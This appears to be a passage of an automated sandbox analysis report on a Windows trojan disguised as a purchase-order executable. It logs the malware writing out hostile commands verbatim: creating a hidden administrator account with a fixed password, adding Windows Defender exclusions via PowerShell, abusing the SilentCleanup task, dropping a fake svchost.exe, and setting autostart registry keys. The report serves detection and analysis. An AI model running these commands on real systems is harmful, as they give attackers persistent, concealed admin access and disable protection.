                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup users "user" /addJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators "user" /delJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /IJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -ForceJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -ForceJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -ForceJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exeJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /addJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators ADMIN~1 /addJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup users "user" /addJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators "user" /delJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Process Where ProcessID=&apos;6588&apos;
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeWMI Queries: IWbemServices::ExecMethod - root\CIMV2 : Win32_Process.Handle=&quot;6588&quot;::GetOwner
                      Source: C:\Windows\SysWOW64\net1.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Process Where ProcessID=&apos;4876&apos;
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeWMI Queries: IWbemServices::ExecMethod - root\CIMV2 : Win32_Process.Handle=&quot;4876&quot;::GetOwner
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Process Where ProcessID=&apos;6712&apos;
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeWMI Queries: IWbemServices::ExecMethod - root\CIMV2 : Win32_Process.Handle=&quot;6712&quot;::GetOwner
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#NEW ORDER FOR JANUARY 2022.exe.logJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_knfqx50j.snp.ps1Jump to behavior
                      Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@71/19@1/1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1744:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2628:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:612:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4780:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1556:120:WilError_01
                      Source: #NEW ORDER FOR JANUARY 2022.exe, DBAABFDBDFAFCAAFCBAACFCD/CEDBDFAEFBDFECBFCAE.csCryptographic APIs: 'CreateDecryptor'
                      Source: svchost.exe.0.dr, DBAABFDBDFAFCAAFCBAACFCD/CEDBDFAEFBDFECBFCAE.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.df0000.0.unpack, DBAABFDBDFAFCAAFCBAACFCD/CEDBDFAEFBDFECBFCAE.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.0.#NEW ORDER FOR JANUARY 2022.exe.df0000.0.unpack, DBAABFDBDFAFCAAFCBAACFCD/CEDBDFAEFBDFECBFCAE.csCryptographic APIs: 'CreateDecryptor'
                      Source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: #NEW ORDER FOR JANUARY 2022.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: #NEW ORDER FOR JANUARY 2022.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: #NEW ORDER FOR JANUARY 2022.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: aspnet_regbrowsers.pdbp source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730764637.00000000036ED000.00000004.00000001.sdmp
                      Source: Binary string: aspnet_regbrowsers.pdbp??? |?_CorExeMainmscoree.dll?% @ source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp
                      Source: Binary string: ???Oy??.pdbError: CoCreateInstance(IID_ISymUnmanagedWriter) returns %X source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
                      Source: Binary string: ComSvcConfig.pdb?x source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp
                      Source: Binary string: aspnet_regbrowsers.pdb source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730764637.00000000036ED000.00000004.00000001.sdmp
                      Source: Binary string: ilasm.pdb source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
                      Source: Binary string: E:\A\_work\940\s\obj\Editor\IntellisenseDef\Release\net472\Microsoft.VisualStudio.Language.Intellisense.pdb source: svchost.exe, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
                      Source: Binary string: ComSvcConfig.pdb source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_00DF9101 push ebx; ret 0_2_00DF9102
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_0581060B pushad ; retf 0_2_0581060C
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_05812C5E pushfd ; ret 0_2_05812C61
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_0581C95B push eax; iretd 0_2_0581C961
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_00BF9101 push ebx; ret 32_2_00BF9102
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F2504 push E802005Eh; ret 32_2_053F2509
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078EF6B8 push eax; retf 32_2_078EF6B9
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078EFC53 push eax; iretd 32_2_078EFC59
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_00FB9101 push ebx; ret 36_2_00FB9102
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878EDE0 push eax; ret 36_2_0878EDE1
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878EE98 pushfd ; ret 36_2_0878EE99
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 37_2_058E03EF push E801005Eh; ret 37_2_058E0409
                      Source: #NEW ORDER FOR JANUARY 2022.exeStatic PE information: 0xAF0CF1CB [Wed Jan 24 10:45:31 2063 UTC]
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.93856030024
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.93856030024

                      Persistence and Installation Behavior:

                      barindex
                      Adds a new user with administrator rightsShow sources
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /addJump to behavior
                      Drops executables to the windows directory (C:\Windows) and starts themShow sources
                      Source: unknownExecutable created and started: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                      Drops PE files with benign system namesShow sources
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeFile created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeJump to dropped file
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeFile created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeJump to dropped file
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeFile created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Creates an autostart registry key pointing to binary in C:\WindowsShow sources
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CBCDCCADCFFABAADCAAEECCJump to behavior
                      Creates autostart registry keys with suspicious namesShow sources
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECCJump to behavior
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CBCDCCADCFFABAADCAAEECCJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CBCDCCADCFFABAADCAAEECCJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECCJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECCJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECCJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECCJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Contains functionality to hide user accountsShow sources
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.723973005.0000000003251000.00000004.00000001.sdmpString found in binary or memory: laREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v 3 /t REG_DWORD /d 0
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpString found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmpString found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmpString found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v 3 /t REG_DWORD /d 0
                      Source: svchost.exe, 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmpString found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v 3 /t REG_DWORD /d 0
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpString found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
